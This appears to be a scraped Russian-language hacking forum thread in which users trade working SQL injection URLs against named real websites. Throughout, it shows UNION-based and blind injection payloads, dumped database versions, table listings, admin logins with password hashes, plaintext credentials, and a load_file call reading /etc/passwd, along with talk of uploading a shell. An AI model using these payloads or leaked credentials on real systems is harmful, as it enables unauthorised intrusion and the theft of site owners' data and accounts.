http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/* 4.0.25-standard-log к users так ии не смог ничего подобрать...
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* чтото странное он пишет! Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
http://hyundai-trex.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* Вот еще!!! Хз,но раскрутить не получилось!
http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/* Database Version: 4.0.23-standard Database name: laptops_main User name: laptops_main@localhost 2 BanQui вот тебе твоя скуля.... таблицы подобрать не смог.. результат смотрим в хедере во 2-й походу слепая скуля...не стал подзапросами мучать если сильно надо сам добьёшь
Glaad.org - PR 7 4 версия. но есть права ) и так.. не пробвал шелл заливать.. думаю фильтирует кавычки... Onthecommons.org - PR 6 http://onthecommons.org/login.php admin;admin Clasp.org - PR 6 TurkishCulturalFoundation.org - PR 5 Agsafe.com.au - PR 4
http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,database(),user(),version()),2,3-- листаем вниз, наводим мышку на "2", с адреса ссылки выдераем: utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; ) и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F6574632F706173737764),2,3--
впринципе ты оказался прав.. скажу сразу пинг до сайта, по крайней мере у меня большой был, поэтому может грузиться долго version(): 5.0.45-log user(): inforosnet@localhost database(): inforosnet так как версия 5 - смотрим таблицы беглым взглядом окинув таблицы и ничего интересного не найдя в их названиях - проверил пару из них здесь несколько мыльников... так и не найдя ничего интересного, а скорее всего не пытаясь ничего интересного найти, так как очень хотелось спать, я запостил тут коммент и лег спать=)
Сегодня у нас - .com.ua Autosvit.com.ua - PR 4 Justinian.com.ua - PR 4 Expohome.com.ua - PR 4 Aquariumist.com.ua - PR 4 Zoorinok.com.ua - PR 3 Tribaldance.com.ua - PR 3 а так же .te.ua City.te.ua Tehnosvitlo.te.ua Dovidka.te.ua Idea-key.te.ua
Народ load_file(0x2F6574632F706173737764) x2F6574632F706173737764 это какая кодировка? чем или где можно расшифровать?
http://www.topsport.ro/Web/News.php?NewsID=533+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6+limit+1,1/* Database Version: 4.1.4-gamma-max-log Database name: topsport User name: root@localhost нашел только mysql.user но ничего интересного там нет http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),2,3,4,5,6,7,8,9,10-- Database Version: 51a-community-log Database name: datacont_one User name: datacont_gigiftp@localhost из information.schema_tables и information.schema_columns интересное только abcn_users http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT(name,login,password)+FROM+datacont_one.abcn_users+LIMIT+0,1)),0x71),0x71),2,3,4,5,6,7,8,9,10-- Administrator:corada:25033b69ce6b84e5efaf67667bdffb52e1 http://www.dentland.ro/index.php?newsid=28+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7,8,9+LIMIT+1,1-- Database Version: 4.1.22-standard-log Database name: dentland_dent User name: dentland_dentlan@localhost http://www.dentland.ro/index.php?newsid=-28+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,name,password,username),0x71),0x71),3,4,5,6,7,8,9+FROM+jos_users+LIMIT+0,1-- Administrator:ada6360c5d3d4ca341930bd574c9f9aa:0EnDhTTFqxPkZGCb:admin http://www.arhitectura1906.ro/newsdetail.php?id_nws=26+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),User(),Database()),4,5,6,7,8,9,10,11,12,13,14,15,16+LIMIT+1,1/* Database Version: 4.1.22-standard Database name: usr_web15_2 User name: web15@localhost http://www.3minute.ro/stire.php?NewsID=12746+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+LIMIT+1,1&NewsCategoryID=13&BackURL=Lw== Database Version: 5.0.51a-community-log Database name: minute_db User name: minute_user@localhost как ни странно но ничего интересного не нашел в БД..может я не смотрел..но никакого подозрения на наличие пасов или юзеров я не нашел http://www.btldesign.ro/detalii-noutate.php?newsID=46+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8+LIMIT+1,1/* Database Version: 4.1.22-standard Database name: ionradu_btl User name: ionradu_btl@localhost http://www.btldesign.ro/detalii-noutate.php?newsID=-46+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,pass,user,userid),0x71),0x71),3,4,5,6,7,8+FROM+user+LIMIT+0,1/* btldesign2003:admin:1 xadmin:designit:2 http://www.btldesign.ro/admin http://www.ecotic.ro/comunicate.php?NewsId=-20+UNION+SELECT+1,2,3,4,5,CONCAT_WS(0x3a,User(),Version(),Database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* Database Version: 4.1.20-log Database name: ecotic User name: ecotic@localhost http://magureanusiasociatii.eu/news.php?go=fullnews&newsid=-2+union+select+1,2,3,4,CONCAT_WS(0x3a,user(),version(),database()),6,7/* Database Version: 4.0.27-standard Database name: magurean_gm User name: magurean@localhost всем спасибо.
_http://www.viperson.ru/wind.php?ID=-...t+0,1/*&soch=1 Версия():4 mysql.user user:root password:1q2w3e host:% _http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,user(),database(),5,6,version()/* user():[email protected] database():shop96ru version():5.0.41-log _http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,name,pass,email)+from+auto_users+limit+0,1/* _http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,access,name,login,passwd,tel,email)+from+ha_users+limit+0,1/* _http://www.di-do.ru/info.php?id=-1+union+select+version(),database(),3,4,USer(),6,7,8,9,10,11/* user():fenshuj_seller@localhost database():fenshuj_realshop version():4.1.22-standard-log _http://dom-zdorovja.ru/product.php?id=-1+union+select+1,2,user(),database(),5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20/* user():domzdor7_alexey@localhost database():domzdor7_shop version():4.1.22-log Ps:Дохлая какай-то тема(( _http://www.inst.ru/catalog.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/* user():[email protected] database():instruct version():4.0.27-max-log _http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,database(),3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*&id=1 user():wwditrix@localhost database():directrix version():4.0.27-1-log
магазин техники zvi.ru http://www.zvi.ru/cat.php?cat=3 Database Version: 5.0.26 Database name: shop2 User name: szvi@localhost Code: http://www.zvi.ru/cat.php?cat=3%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* поля для вывода 2,7
ООО "Жилищный капитал", г. Волгоград Code: http://www.jk-nbik.ru/?alias=show&id=260' Code: http://www.jk-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((SELECT+table_name+FROM+information_schema.tables+limit+1,1),1,1)) Code: http://www.jk-nbik.ru/?alias=show&id=256++AND+1%3Cascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name+like+char(105,109,103,101,115)+limit+1,1),1,1)) VERSION(): 5.0.51a-community-log USER: lipnbikr_sergio@localhost DATABASE(): lipnbikr_jk Список таблиц и колонок: Code: ************************************ LLN_catalog ----------------------------------- id name abc sort ************************************ LLN_check ----------------------------------- check_id ch_date etap id proverok send status ************************************ LLN_info ----------------------------------- id info ************************************ LLN_letters ************************************ LLN_links ----------------------------------- add_date backlink banner cat cy host id link mail status ************************************ LLN_modules ----------------------------------- name sort ************************************ LLN_mylinks ----------------------------------- id link type *********************************** LLN_values ----------------------------------- name value value_date value_int ************************************ imges ------------------------------------ Id ************************************ novostroy ------------------------------------ area building_descr city course_usd direction highway how_far how_far1 how_fast id location location1 obj_rur obj_usd obn_descr obn_link obn_photo obn_time obn_type org_logo org_name orient phone price_rur price_usd ************************************ ut_cities ------------------------------------ c_direction c_distance c_id c_name c_sort ************************************ ut_img ------------------------------------ active Descr Id ParentID type ************************************ ut_news ------------------------------------ Data Descr1 Descr2 Header Id img imgs isPublic Press status ************************************ ut_section ------------------------------------ Alias isInMap isInMenu isPublic isSearch Links MOrderIndex MParentID OrderIndex ParentID SectionID ************************************ ut_sectiondata ------------------------------------ Content Descr Header Keywords LangID mtime SectionID Title ************************************ ut_zm ------------------------------------ c_direction c_distance c_id c_name c_sort ************************************
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user(),version(),database()) таблиц 150+, ничего интересного в первых 35 не увидел, кроме "adminsmail_start" если интересно кому - попробуйте до конца её =)
